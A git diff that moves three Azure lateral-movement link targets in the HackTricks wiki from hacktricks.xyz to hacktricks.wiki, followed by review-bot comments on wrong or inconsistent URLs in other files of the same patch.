diff --git a/src/windows-hardening/lateral-movement/README.md b/src/windows-hardening/lateral-movement/README.md index f43129809..648a1f1e7 100644 --- a/src/windows-hardening/lateral-movement/README.md +++ b/src/windows-hardening/lateral-movement/README.md @@ -10,9 +10,9 @@ There are different different ways to execute commands in external systems, here - [**AtExec / SchtasksExec**](atexec.md) - [**WinRM**](winrm.md) - [**DCOM Exec**](dcom-exec.md) -- [**Pass the cookie**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) (cloud) -- [**Pass the PRT**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) (cloud) -- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (cloud) +- [**Pass the cookie**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html) (cloud) +- [**Pass the PRT**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html) (cloud) +- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html) (cloud) {{#include ../../banners/hacktricks-training.md}}
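
Review bot: In src/macos-hardening/.../macos-electron-applications-injection.md the new link adds the fragment `#rce-xss--contextisolation`, but the sentence offers it as general background ("If you don't know what Electron is"). The removed URL pointed at the page as a whole. Drop the fragment so the reader lands at the top of `electron-desktop-apps/index.html`, or reword the sentence if the deep link is intended.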
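
Review bot: In src/network-services-pentesting/43-pentesting-whois.md the replacement URL still targets `pentesting-smtp/index.html`, although the entry it closes describes the WHOIS protocol. The removed line had the same wrong target, so the patch carries an existing error onto the new domain. Since this line is being touched anyway, point it at the WHOIS page, which by the pattern of the other single-file hunks would be `.../network-services-pentesting/43-pentesting-whois.html`.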
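
Review bot: In src/network-services-pentesting/pentesting-dns.md the new URL sits under `/en/todo/pentesting-dns.html`, while the file lives in `src/network-services-pentesting/` and every other service hunk in this patch maps to `/en/network-services-pentesting/...`. Please confirm the `todo` path is intended. If it is not, use `/en/network-services-pentesting/pentesting-dns.html` to match the file's location.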
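
Review bot: In src/network-services-pentesting/pentesting-snmp/README.md the added URL ends in `pentesting-smtp/index.html`, whereas the removed line pointed at `pentesting-snmp` and the note directly above it describes SNMP. This looks like a copy-paste slip from the SMTP hunk. The target should be the SNMP page, which by the pattern of the other README.md hunks would be `.../network-services-pentesting/pentesting-snmp/index.html`.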
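
Review bot: In src/pentesting-web/file-upload/README.md the fragment changes from `#code-execution-via-httaccess` to the broader `#code-execution`, while the link text still promises the **.htaccess** trick specifically. Check that the new anchor lands on the .htaccess section. The unchanged ASP line right below uses a relative link (`../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files`), so a relative link to the php-tricks page with its exact anchor would be consistent and would not need another pass on the next domain change.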
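
Review bot: In src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md the loop now assigns `https://hacktricks.wiki` to `a.href`, but the unchanged context line right after it still tests `a.hostname === "hacktricks.xyz"`. After this change the condition can never be true and `log` stays empty, so the snippet no longer demonstrates anything. Update the comparison to `"hacktricks.wiki"` in the same hunk, or leave both lines on the old domain, since this is sample code rather than a navigational link.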
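
Review bot: In the first hunk of src/todo/cookies-policy.md the list of covered websites is rewritten, yet the `Last updated: 02/04/2023` line visible in the hunk context is left as it is. A change to the scope of the policy should bump that date. It is also worth stating whether the old `.xyz` hosts remain covered for as long as they keep serving or redirecting.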
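
Review bot: In the second hunk of src/todo/cookies-policy.md only the hostnames are swapped in the sentence saying that book and cloud "are hosted in Gitbook", and the Gitbook cookie-policy link is kept. Please confirm that this hosting statement still holds for the `.wiki` sites. A cookies policy that names the wrong third-party processor is a content error, not just a stale URL.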
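
Review bot: In src/welcome/hacktricks-values-and-faq.md the bibtex template becomes `https://book.hacktricks.wiki/specific-page`, without the `/en/` prefix and `.html` suffix that every other book URL in this patch carries. Readers who fill in the template as written would produce citations that do not match the new URL scheme. Consider `https://book.hacktricks.wiki/en/specific-page.html` as the placeholder.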